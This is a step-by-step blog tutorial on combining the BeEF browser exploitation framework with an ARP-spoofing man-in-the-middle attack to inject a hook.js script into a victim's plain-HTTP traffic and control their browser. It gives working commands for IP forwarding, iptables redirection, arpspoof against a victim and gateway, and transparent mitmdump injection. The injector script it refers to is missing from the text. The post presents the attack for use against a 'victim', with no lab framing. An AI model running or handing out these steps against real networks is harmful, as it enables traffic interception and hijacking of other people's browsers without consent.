In this article, I will demonstrate how the Browser Exploitation Framework (BeEF) can be used together with Man In The Middle Attack (MITM) to hack web browsers.
What is BeEF?
What is Man In The Middle Attack?
Man In The Middle Attack is where an attacker places himself between you, and your router using a technique known as ARP spoofing.
By doing so, all your Internet traffic is routed though the attacker's machine (the "man in the middle") instead of your router. This will give the attacker an advantage because he/she can now see and even modify your Internet traffic (both incoming and outgoing) as they want. This is obviously only valid only for websites that don't use a secure HTTPS connection. Since HTTPS provides authenticity and encryption, Man In The Middle Attack won't work on HTTPS websites.
Combining BeEF and Man In The Middle Attack
The idea is simple, we want to modify the internet traffic of the victim such that before sending him/her the website responses, we will inject the "hook.js" file in the response messages. In this way, BeEF can control all the websites that the victim is using on his browser.
Step 1. Install BeEF
BeEF comes pre-installed with Kali Linux, but if you want to install it manually you can do so,
sudo apt-get install beef-xss
Step 2. Run BeEF
You can start BeEF framework by typing this command
This will start BeEF and serve a web interface at http://<IP>:3000/ui
Go to this URL, and login with the default credentials (username: beef, password: beef)
Now you can see the BeEF control panel
Step 3. Start the Man In The Middle Attack
In-order to start the MITM attack, you first need to enable IP forwarding on your Kali Linux,
sudo sysctl -w net.ipv4.ip_forward=1 sudo iptables -A FORWARD --in-interface [iface] -j ACCEPT sudo iptables -t nat -A PREROUTING -i [iface] -p tcp --dport 80 -j REDIRECT --to-port 8080
Replace [iface] with your interface in the above commands. You can find out your interface name by typing in "ifconifg" in your terminal.
Next, you need to install the arpspoof utility.
sudo apt-get install dsniff
Then, start the ARP spoofing with the arpspoof utility.
In the first terminal, run
arpspoof -i [iface] -t [victim-ip] [gateway-ip]
The [victim-ip] should be the IP address of the victim, [gateway-ip] is the IP address of your router (you can find it out by typing in "ip route" in your terminal)
In your second terminal, run
arpspoof -i [iface] -t [gateway-ip] [victim-ip]
The Man In The Middle is now setup. All the victim's internet traffic on port 80 is routed through our machine. But, in order to monitor or modify the traffic, we need to use a proxy tool. We'll be using a tool called "mitmproxy".
First, install it
sudo apt-get install mitmproxy pip install mitmproxy
Before we start the proxy tool, we need to write a python utility that will automatically inject the "hook.js" file in every response message captured by the proxy tool.
Here is the python script that does it,
Replace the IP address 0.0.0.0 with your IP address (where the BeEF is running)
Now, start the proxy tool by giving this python script as input.
mitmdump --mode transparent -s js_injector.py
This will start the proxy tool, and for every response it captures, it will execute the python script that is passed as input, which in turn will inject the "hook.js" file into the message.
That's it! Now, all the websites that work on plain HTTP are injected with the hook.js file and you can control all of them using BeEF control panel.